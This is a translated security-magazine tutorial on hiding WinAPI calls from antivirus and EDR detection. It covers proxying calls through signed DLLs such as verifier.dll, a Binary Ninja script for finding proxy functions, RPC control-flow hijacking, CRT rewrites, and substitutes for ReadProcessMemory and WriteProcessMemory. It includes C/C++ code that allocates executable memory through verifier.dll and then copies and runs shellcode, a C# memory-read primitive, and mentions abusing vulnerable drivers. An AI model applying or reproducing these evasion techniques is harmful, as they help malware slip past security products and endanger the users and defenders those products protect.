Crooked path. New obfuscation techniques for WinAPI calls

All malicious tools try to hide their WinAPI calls: if the program code contains suspicious functions, its execution can be blocked. There are very few documented ways to obfuscate WinAPI calls, but I would like to share with you some promising ideas in this field. Prepare to scan memory, examine Windows components, and even abuse RPC.

warning

This article is intended for security specialists operating under a contract; all information provided in it is for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication. Distribution of malware, disruption of systems, and violation of secrecy of correspondence are prosecuted by law.

As you know, any (even the most terrible) ‘virus’ is just a program that uses the same mechanisms and functions as legitimate software. It can be said that malware abuses functions available to any developer. Sometimes, undocumented features are abused as well… This is what we call “hacking”!

To decide whether a program is malicious, an antivirus analyzes and compares many factors, but the most important one is the set of functions used in its code. Many different aspects can be analyzed: hooks, import tables, execution flow… In difficult cases, even quick decompilation can be performed. Hackers, in turn, have found ways to unhook ntdll.dll, hide the IAT, use API hashing, and prevent DLL loading.

Imagine a situation where you can avoid calling suspicious functions: you don’t touch dangerous things, and the antivirus doesn’t touch you!

For example, instead of VirtualAllocEx(), you could call some alternative. Certain techniques let you work around ‘suspicious’ methods without calling them directly and without having to hide their use.

Proxying calls

Theory

This technique is called Proxy Invoke: a hacker finds a function that makes the required calls (thus, ‘proxying’ these calls). In effect, Proxy Invoke abuses third-party wrappers around existing methods.

For example, the ZwProtectVirtualMemory() function makes it possible to change memory permissions. It’s considered somewhat dangerous because, using it, you can mark a memory region as executable. An attempt to use this function would trigger an alert (e.g. in Elastic).

www

For more information, you can check the article Doubling Down: Detecting In-Memory Threats with Kernel ETW Call Stacks.

The very first alert shown in the above screenshot (i.e. VirtualProtect API Call from an Unsigned DLL) is of special interest. The detection logic is simple: if a function is called from the address space of an unsigned library, then this call is considered malicious. This is reasonable: why would an ordinary developer call a Zw function directly from their program? There is something screwy about it…

Such detection can be bypassed using proxying. You have to find a legitimate signed binary with an exported function that passes the control flow to the target function.

Below is the initial control flow:

malware → ntdll!ZwProtectVirtualMemory

The modified control flow will look as follows:

malware → signed!SomeFuncToProtectMemory → ntdll!ZwProtectVirtualMemory

As a result, no detection occurs because the call chain starts from a legitimate signed library. Similar logic in a slightly simplified format is implemented in the Parasite-Invoke tool. However, it only works with programs written in C#.
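
To see why the extra hop changes the verdict, the rule described above can be modelled in a few lines of Python. This is only a toy sketch: the Frame type, the is_flagged() function, and the assumption that the rule inspects only the immediate caller are made up for illustration and do not reproduce the actual Elastic rule.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Frame:
    module: str   # module that owns the calling code
    signed: bool  # whether that module carries a valid signature

def is_flagged(call_chain, target="ntdll!ZwProtectVirtualMemory"):
    """Toy rule (assumed simplification): flag the call when the frame
    that directly invokes the target belongs to an unsigned module."""
    *callers, callee = call_chain
    if callee != target or not callers:
        return False
    return not callers[-1].signed

direct = [Frame("malware.dll", False), "ntdll!ZwProtectVirtualMemory"]
proxied = [Frame("malware.dll", False), Frame("signed.dll", True),
           "ntdll!ZwProtectVirtualMemory"]

print(is_flagged(direct))   # True
print(is_flagged(proxied))  # False
```

Note that a rule walking the whole chain instead of the immediate caller would still see the unsigned frame in the second case, so the result depends entirely on how deep the check goes.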

Identifying proxy functions

Export/import table

There is an easy way, and there is the way of the samurai. Let’s start with the easy one. Its idea is as follows: you quickly analyze all the signed DLLs in the system and identify functions contained in them that can be reached. There are two variants.

You can go by the import table. For example, you see the import of ZwProtectVirtualMemory(), find the place where this function is called, and check whether it’s possible to control its arguments; or
You can go by the export table. For example, you see the export of the AllocateAndProtectSomeMemory() function, decide that its functionality can potentially be of interest to you, and examine this function in detail.

The findSymbols.py script expedites and simplifies such analysis.

For instance, this is how you can find all imports of the MiniDumpWriteDump() function.

This is how you can analyze exports:

python .\findSymbols.py "c:\windows\system32" -s "memory" -e

However, not all functions are declared as exported, and you can also perform analysis of symbols (as I did in SymProcAddress). But still, there are too many ‘ifs’ and excessive research. You want to automate the process and instantly call the required function, right? Then your choice is bushido!

Binary analysis

The way of the samurai is as follows: you automate the binary file analysis stage using the API of some decompiler. I borrowed this technique from cryptoplague who uses Binary Ninja to automate the analysis of signed DLLs. The original code is as follows:

import os
import binaryninja
from binaryninja.highlevelil import HighLevelILCall, HighLevelILConst, HighLevelILVar
signed_dlls_path = r'C:\Users\user\source\repos\SignedDllAnalyzer\signed_dlls.txt'
with open(signed_dlls_path, "r") as f:
    signed_dlls = [dll.strip() for dll in f]
total_dlls = len(signed_dlls)
with open(signed_dlls_path, "r") as f:
    current_dll = 0
    for signed_dll_path in f:
        current_dll += 1
        signed_dll_path = signed_dll_path.strip()
        dll_name = signed_dll_path.split('\\')[-1]
        dll_size_mb = os.path.getsize(signed_dll_path) / 1024 / 1024
        progress = f"{current_dll}/{total_dlls}"
        if dll_size_mb > 15:
            print(f"[-] [{progress}] [{dll_name}] [{dll_size_mb:.2f} > 15 MB]")
            continue
        print(f"[*] [{progress}] [{dll_name}] [{dll_size_mb:.2f} MB]")
        with binaryninja.load(signed_dll_path, update_analysis=False) as binary_view:
            ntAllocateVirtualMemorySymbol = binary_view.get_symbol_by_raw_name("NtAllocateVirtualMemory")
            if not ntAllocateVirtualMemorySymbol:
                continue
            else:
                print(f"[+] [{progress}] [{dll_name}] [NtAllocateVirtualMemory]")
                binary_view.set_analysis_hold(False)
                binary_view.update_analysis_and_wait()
                code_refs = binary_view.get_code_refs(ntAllocateVirtualMemorySymbol.address)
                for ref in code_refs:
                    try:
                        func = binary_view.get_functions_containing(ref.address)[0]
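                        hlil_instr = func.get_llil_at(ref.address).hlil
                        hlil_call = None  # reset so a call found for a previous reference is never reused
                        for operand in hlil_instr.operands:
                            if type(operand) == HighLevelILCall:
                                if operand.dest.value.value == ntAllocateVirtualMemorySymbol.address:
                                    hlil_call = operand
                                    break
                        if hlil_call is None:
                            continue  # the reference is not a direct call to the target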
                        args = hlil_call.params
                        protect = args[5]
                        regionSize = args[3]
                        if type(protect) == HighLevelILVar:
                            if protect.var not in func.parameter_vars:
                                continue
                        if type(regionSize) == HighLevelILVar:
                            if regionSize.var not in func.parameter_vars:
                                continue
                        if type(protect) == HighLevelILConst:
                            if int(protect.value) != 0x40:
                                continue
                        if type(regionSize) == HighLevelILConst:
                            if int(regionSize.value) <= 0x10000:
                                continue
                        print(f"[+] [{progress}] [{dll_name}] [{hex(ref.address)}] [{hlil_instr}]")
                    except Exception as e:
                        print(f"[x] [{progress}] [{dll_name}] [{e}]")

Let’s examine this script step by step since it contains several nontrivial ideas.

First of all, the script reads a text file containing paths to signed libraries (e.g. those located in C:\Windows\System32).

import os
import binaryninja
from binaryninja.highlevelil import HighLevelILCall, HighLevelILConst, HighLevelILVar
signed_dlls_path = r'C:\Users\user\source\repos\SignedDllAnalyzer\signed_dlls.txt'
with open(signed_dlls_path, "r") as f:
    signed_dlls = [dll.strip() for dll in f]
total_dlls = len(signed_dlls)

Then each library is analyzed in a loop.

with open(signed_dlls_path, "r") as f:
    current_dll = 0
    for signed_dll_path in f:
        current_dll += 1
        signed_dll_path = signed_dll_path.strip()
        dll_name = signed_dll_path.split('\\')[-1]
        dll_size_mb = os.path.getsize(signed_dll_path) / 1024 / 1024
        progress = f"{current_dll}/{total_dlls}"
        if dll_size_mb > 15:
            print(f"[-] [{progress}] [{dll_name}] [{dll_size_mb:.2f} > 15 MB]")
            continue
        print(f"[*] [{progress}] [{dll_name}] [{dll_size_mb:.2f} MB]")
        with binaryninja.load(signed_dll_path, update_analysis=False) as binary_view:

The program checks the size of each library and doesn’t analyze those exceeding 15 MB. Smaller libraries are passed to Binary Ninja for binary analysis using the load() method.
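
The two bookkeeping steps of this loop (extracting the file name and applying the size limit) can be tried in isolation. The sketch below is a variant of that logic, not the original code: the dll_name() and should_analyze() helpers are hypothetical names, and ntpath is used so that Windows paths are split correctly on any host OS.

```python
import ntpath

MAX_SIZE_MB = 15  # same threshold as in the script above

def dll_name(path):
    # ntpath understands backslash separators regardless of the host OS
    return ntpath.basename(path)

def should_analyze(size_bytes, limit_mb=MAX_SIZE_MB):
    # Libraries larger than the limit are skipped to keep analysis time sane
    return size_bytes / 1024 / 1024 <= limit_mb

print(dll_name(r"C:\Windows\System32\verifier.dll"))  # verifier.dll
print(should_analyze(16 * 1024 * 1024))               # False
print(should_analyze(2 * 1024 * 1024))                # True
```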

Binary Ninja and BinaryView

Importantly, Binary Ninja not only has a GUI, but also an API: using it, you can load a binary file and perform some automatic analysis.

The binary will be represented as a BinaryView object (bv in the documentation). It provides a set of methods that can be applied to the file (e.g. get the list of its functions).

>>> bv
<BinaryView: '/bin/ls', start 0x100000000, len 0x182f8>
>>> len(bv.functions)
140

Using BinaryView, you can retrieve Function objects, each of which represents (what a surprise!) a function in the code.

The function is presented in BNIL (Binary Ninja Intermediate Language), a family of intermediate representations that Binary Ninja lifts machine code into. There are several forms: LLIL, MLIL, HLIL, and Pseudo-C; they differ in their level of abstraction. The higher the level, the more human-readable the code; the lower the level, the closer it is to what your computer actually executes.

The SSA (Static Single Assignment) form is supported separately. SSA is a representation that compilers use to simplify optimization; its main idea is that each variable is assigned a value in exactly one place in the code.
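
The single-assignment idea is easy to demonstrate on straight-line code. The following is a minimal sketch, assuming statements of the form "name = expression" without branches (so no phi nodes are needed); the to_ssa() helper and the name_N numbering scheme are illustrative and are not Binary Ninja's own notation.

```python
import re

def to_ssa(lines):
    """Rename variables in straight-line 'x = expr' statements so that
    every name is assigned exactly once."""
    version = {}  # variable name -> latest version number
    out = []
    for line in lines:
        target, expr = [part.strip() for part in line.split("=", 1)]

        def latest(match):
            name = match.group(0)
            # Uses on the right-hand side refer to the latest known version
            return f"{name}_{version[name]}" if name in version else name

        expr = re.sub(r"[A-Za-z_]\w*", latest, expr)
        version[target] = version.get(target, 0) + 1
        out.append(f"{target}_{version[target]} = {expr}")
    return out

print(to_ssa(["x = 1", "x = x + 2", "y = x * x"]))
# ['x_1 = 1', 'x_2 = x_1 + 2', 'y_1 = x_2 * x_2']
```

After renaming, every use points at exactly one definition, which is what makes it straightforward to trace where an argument's value comes from.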

To search for functions, the following algorithm is used:

Get a BinaryView;
Find out whether the required function is used in it;
Determine the location from where the required function is called; and
Make sure that you can control arguments passed to this function.

All these steps can be automated using Binary Ninja. First, you search for a given symbol. If there is no such symbol, then the function isn’t used.

ntAllocateVirtualMemorySymbol = binary_view.get_symbol_by_raw_name("NtAllocateVirtualMemory")
if not ntAllocateVirtualMemorySymbol:
    continue
else:
    print(f"[+] [{progress}] [{dll_name}] [NtAllocateVirtualMemory]")

After making sure that the required method is present, you start analysis. The set_analysis_hold() method ‘enables’ the analysis; while update_analysis_and_wait() performs it.

binary_view.set_analysis_hold(False)
binary_view.update_analysis_and_wait()

After BN has analyzed the binary code, you can proceed to step three: you have to find places that refer to the required method using get_code_refs().

code_refs = binary_view.get_code_refs(ntAllocateVirtualMemorySymbol.address)

Then you go through all these references in a loop to find functions that refer to the required method.

for ref in code_refs:
    try:
        func = binary_view.get_functions_containing(ref.address)[0]

Next, you have to make sure that the function is actually called (i.e. it’s not just a reference to an address).

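hlil_instr = func.get_llil_at(ref.address).hlil
hlil_call = None  # reset so a call found for a previous reference is never reused
for operand in hlil_instr.operands:
    if type(operand) == HighLevelILCall:
        if operand.dest.value.value == ntAllocateVirtualMemorySymbol.address:
            hlil_call = operand
            break
if hlil_call is None:
    continue  # the reference is not a direct call to the target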

To do this, you get LLIL (low-level instruction representation) at the given address, convert it to HLIL, and confirm that the function is actually called based on the presence of the Call operand.

Finally, you get the function parameters and analyze them to find out whether you can affect these variables using parameters of the wrapper function.

args = hlil_call.params
protect = args[5]
regionSize = args[3]
if type(protect) == HighLevelILVar:
    if protect.var not in func.parameter_vars: # Skip unless the variable is a parameter of the enclosing function
        continue
if type(regionSize) == HighLevelILVar:
    if regionSize.var not in func.parameter_vars:
        continue
if type(protect) == HighLevelILConst:
    if int(protect.value) != 0x40:
        continue
if type(regionSize) == HighLevelILConst:
    if int(regionSize.value) <= 0x10000:
        continue
print(f"[+] [{progress}] [{dll_name}] [{hex(ref.address)}] [{hlil_instr}]")

Using this script, I managed to identify the place where the NtAllocateVirtualMemory() function is used inside verifier.dll.

Further research made it possible to locate the DphCommitMemoryFromPageHeap() function from verifier.dll; inside this function, NtAllocateVirtualMemory() was called.

Here is the much-desired NtAllocateVirtualMemory()!

Example with DphCommitMemoryFromPageHeap

After you’ve found the required function, you have to transfer the control flow to its address. This can be done in two ways:

determine the function offset relative to the base address of the DLL loaded to memory; or
determine the address of the target function by the byte pattern.

I suggest following the second way: scanning memory for a specific byte sequence. First of all, let’s use IDA to determine the initial instructions of the target function.

Instructions that will be used to search for the function

Then convert them into opcodes that will be used in the scan.
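
The scan itself is ordinary signature matching, the same mechanism that antivirus signatures rely on. Below is a minimal sketch of such a search with wildcard support. The find_pattern() helper is a hypothetical name, and both the buffer and the pattern are made-up bytes used purely for illustration; they are not the actual prologue of any function from verifier.dll.

```python
def find_pattern(buffer, pattern):
    """Return the offset of the first match, or -1 if there is none.
    `pattern` is a list of ints (0-255); None stands for a wildcard byte."""
    n = len(pattern)
    for offset in range(len(buffer) - n + 1):
        if all(p is None or buffer[offset + i] == p
               for i, p in enumerate(pattern)):
            return offset
    return -1

# Made-up bytes standing in for a loaded module image
image = bytes.fromhex("909048895c240855488bec4883ec20c3")

# 48 89 5C 24 ?? 55, where ?? matches any byte
pattern = [0x48, 0x89, 0x5C, 0x24, None, 0x55]

print(find_pattern(image, pattern))  # 2
```

The address of the function is then the module base plus the returned offset. Wildcards are useful for bytes that may differ between builds, such as displacements.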

Defining prototype of the function to be called.

typedef int (WINAPI* DphCommitMemoryFromPageHeapFunc)(
    PVOID* BaseAddress,
    PSIZE_T RegionSize,
    ULONG Protect
    );

Adding code based on the memory scan and transferring the control flow to the function!

int main()
{
    HMODULE hModule = NULL;
    hModule = LoadLibraryA("verifier.dll");
    DphCommitMemoryFromPageHeapFunc DphCommitMemoryFromPageHeapWPtr = (DphCommitMemoryFromPageHeapFunc)(FindFunction(GetCurrentProcess(), GetFunctionBytes(), (uintptr_t)hModule));
    SIZE_T size = 0xABCD;
    LPVOID addr = nullptr;
    NTSTATUS err = DphCommitMemoryFromPageHeapWPtr(&addr, &size, PAGE_EXECUTE);
    std::wcout << err << std::endl;
    return 0;
}

The full code can be found in my repository on GitHub. Below you can see the result of this call.

In the above-mentioned research, its author calls the AVrfpNtAllocateVirtualMemory() function based on its offset, but you can get its address by the byte pattern if you want.

typedef NTSTATUS (*AVrfpNtAllocateVirtualMemory_t)
(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    ULONG_PTR *RegionSize,
    ULONG AllocationType,
    ULONG Protect
);
DWORD protect{};
LPVOID virtualMemory = nullptr;
SIZE_T size = rawShellcodeLength;
HMODULE hVerifierMod = this->api.LoadLibraryA.call("verifier.dll");
AVrfpNtAllocateVirtualMemory_t AVrfpNtAllocateVirtualMemory = (AVrfpNtAllocateVirtualMemory_t)((char*)hVerifierMod + 0x25110);
AVrfpNtAllocateVirtualMemory(NtCurrentProcess(), &virtualMemory, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
this->api.RtlMoveMemory.call(virtualMemory, rawShellcode, rawShellcodeLength);
(*(int(*)()) virtualMemory)();

Using RPC

Frankly speaking, proxying calls via RPC is a sophisticated technique whose theory won’t fit into a single article. It’s described in detail in a report delivered at one of the conferences. I will try to present it as briefly as possible.

When devices interact over the RPC protocol, marshalling and unmarshalling of transmitted parameters occurs. This is required because function arguments are transmitted over the network, and complex structures cannot be simply placed into a socket.

Data processing occurs in special NDR (Network Data Representation) functions. These functions receive data in the form of RPC_MESSAGE structures. Inside such a structure, there are plenty of other nested structures, and you can manipulate them to transfer the control flow to an arbitrary address.

Transferring the control flow from MIDL_SERVER_INFO

This technique has its own peculiarities: at a minimum, you have to initialize the RPC environment in the current process. A video demonstration is available on YouTube, and a POC can be found on GitHub.

Overall, using the RPC subsystem, you can call any WinAPI function and pass its arguments, which can be considered proxying.

Using alternative functions

Theory

Time to take a breather and examine a slightly simpler technique: using alternative functions, you can try to find a workaround to the required functionality. For instance, instead of using the memcpy() function, you can write the method logic yourself and manually copy the data using pointers. Or, as an alternative, you can find and call a slightly lower-level (and potentially unhooked) analogue.

Generally speaking, this technique is closely related to proxy functions: some method can call the original function under the hood or act as a wrapper over a wrapper… Reverse-engineering each of them would take enormous time and effort. What’s most important is to find an alternative WinAPI call.

Substituting CRT

The easiest way is to substitute CRT functions. For instance, you can substitute the memcpy() function as shown below:

PVOID _memcpy(PVOID Destination, PVOID Source, SIZE_T Size)
{
    for (volatile int i = 0; i < Size; i++) {
        ((BYTE*)Destination)[i] = ((BYTE*)Source)[i];
    }
    return Destination;
}

In the same way, you can replace wcscmp() to compare strings:

int custom_wcscmp(const wchar_t* str1, const wchar_t* str2) {
    while (*str1 == *str2 && *str1 != L'\0') {
        str1++;
        str2++;
    }
    return *str1 - *str2;
}

And convert lower case to upper case:

PCHAR CaplockStringA(_In_ PCHAR Ptr)
{
    PCHAR sv = Ptr;
    while (*sv != '\0')
    {
        if (*sv >= 'a' && *sv <= 'z')
            *sv = *sv - ('a' - 'A');
        sv++;
    }
    return Ptr;
}
PWCHAR CaplockStringW(_In_ PWCHAR Ptr)
{
    PWCHAR sv = Ptr;
    while (*sv != '\0')
    {
        if (*sv >= 'a' && *sv <= 'z')
            *sv = *sv - ('a' - 'A');
        sv++;
    }
    return Ptr;
}

CRT contains plenty of functions, and almost all of them can be rewritten so that their logic is implemented manually. More examples can be found in the NOCRT and vx-api repositories.

References to Windows structures

In most cases, Windows uses the same structures in functions with similar logic. This feature makes it possible to search for similar functions. The easiest way is to search using an IDE. To do this, you have to find a header file that contains the structure you are interested in.

info

The same method can be used to search for proxy functions; so, I won’t discuss them separately.

Imagine that you have the SetThreadContext() function that receives a CONTEXT structure.

The CONTEXT structure is defined in the winnt.h file.

You left-click on PCONTEXT, then right-click and select “Find all references”.

You get a long list of references to this structure from different functions.

You examine them and find the RtlCaptureContext2() function with similar capabilities!

Mastering COM

The COM subsystem offers a huge number of various features. You just have to comprehend it and understand its elements: what is a COM class, how are they registered in the system, how interfaces and methods work, and so on. If you manage to do this, you’ll make plenty of exciting discoveries!

www

If you are interested in mastering COM, tools available in my COMThanasia repository can help you with this.

For example, the {00000618-0000-0010-8000-00aa006d2ea4} object has an interface that contains the ChangePassword() method; apparently, this method can be used to change a user’s password. Therefore, you can call ChangePassword() from COM to avoid calling functions from netapi.dll.

Substituting ReadProcessMemory()

Finally, I would like to show you several ‘workarounds’ that can be used to call functions. Currently, ReadProcessMemory() can be substituted in several ways:

by abusing vulnerable drivers (e.g. wnbios64.sys); or
using RtlFirstEntrySList().

The first option is obvious: the driver provides a vulnerable method that can be used to read memory. The second one is slightly more complicated. A researcher whose nickname is x86matthew discovered the RtlFirstEntrySList() function that takes an address and returns the value at this address.

DWORD __stdcall RtlFirstEntrySList(DWORD *pValue)
{
    return *pValue;
}

If you call this function in a remote process using CreateRemoteThread() or NtCreateThreadEx(), you can get a data reading primitive. The author removed the PoC and article from his blog; however, everything is available in the Internet Archive (a link to it is provided below).

If you are working from C# code, make sure to pay attention to System.StubHelpers.StubHelpers.GetNDirectTarget().

public static IntPtr ReadMemory(IntPtr addr)
{
    var stubHelper = typeof(System.String).Assembly.GetType("System.StubHelpers.StubHelpers");
    var GetNDirectTarget = stubHelper.GetMethod("GetNDirectTarget", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
    IntPtr unmanagedPtr = Marshal.AllocHGlobal(200);
    for (int i = 0; i < 200; i += IntPtr.Size)
    {
        Marshal.Copy(new[] { addr }, 0, unmanagedPtr + i, 1);
    }
    return (IntPtr)GetNDirectTarget.Invoke(null, new object[] { unmanagedPtr });
}

Substituting WriteProcessMemory()

The same article by x86matthew proposes an alternative way to write to memory. This solution is based on functions that increment and decrement the value at a given address. By calling these functions for an address in a process multiple times, you can step the value stored there up or down until it reaches the one you need (and, therefore, write to memory).

LONG __stdcall InterlockedIncrement(LONG *Addend);
LONG __stdcall InterlockedDecrement(LONG *Addend);
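
The arithmetic behind this approach can be sketched on plain integers. The example below only simulates a 32-bit LONG locally; the plan() and apply() helpers are hypothetical names introduced for illustration, and the sketch assumes the value wraps around modulo 2^32.

```python
MASK = 0xFFFFFFFF  # a LONG is 32 bits wide

def plan(current, target):
    """Return ('inc' | 'dec', count): the shorter way to move a 32-bit
    value from `current` to `target` in steps of one, with wraparound."""
    up = (target - current) & MASK
    down = (current - target) & MASK
    return ("inc", up) if up <= down else ("dec", down)

def apply(current, op, count):
    # Simulate `count` increments or decrements on a local integer
    step = 1 if op == "inc" else -1
    return (current + step * count) & MASK

print(plan(0x41414141, 0x41414150))  # ('inc', 15)
print(plan(0x00000005, 0xFFFFFFFF))  # ('dec', 6)
```

In the worst case, about 2^31 steps are needed per 32-bit value, which shows how slow this primitive is compared to a direct write.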

Where to look for alternatives

More exciting possibilities and options can be found in the VX-Underground blog. It offers plenty of interesting developments that can be used in your own code. For example, you can start a process not by calling CreateProcess(), but by simulating Win+R keystrokes… Isn’t this cool?

Conclusions

Obfuscation of WinAPI calls is an extremely creative and inspiring process. All you have to do is examine the system from new angles and think outside the box. If you manage to find a new way and deviate from the beaten path, you have a good chance to avoid antivirus radars!

Good luck!
